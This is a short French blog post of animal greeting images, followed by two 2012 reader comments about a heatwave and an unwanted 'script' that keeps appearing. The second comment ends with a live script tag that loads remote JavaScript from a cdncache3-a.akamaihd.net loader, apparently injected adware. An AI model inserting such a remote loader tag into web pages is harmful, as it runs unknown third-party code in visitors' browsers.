• Bonjour les amis

    Bonjour les amis

     

    Amis animaux . Images trouvées sur internet. MERCI aux personnes qui partagent . Lorsque je le peux j'utilise mes propres photos.

     

    Bonjour les amis

     

    Bonjour les amis


  • Commentaires

    2
    Jeudi 16 Août 2012 à 22:24

    Coucou Nadouche , merci de ta visite. En effet, il y a toujours ce script : as-tu essayé de trouver ce que c'était ? je vais regarder sur GOOGLE à quoi ça correspond.

    Bonne nuit. Demain canicule chez moi . Moi j'ai la clim. heureusement , mais mes Parents sont âgés et sont dans la zone de canicule également , donc souci.

    Bisous.

    1
    Jeudi 16 Août 2012 à 19:44

    Une belle création  -j'aime les animaux,

    j'ai réglé mon souci en publiant un autre billet par contre je l'ai pas remplis hiiii

    petit à petit - et désolée le script me suit toujours par contre - gros bisous

    <script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :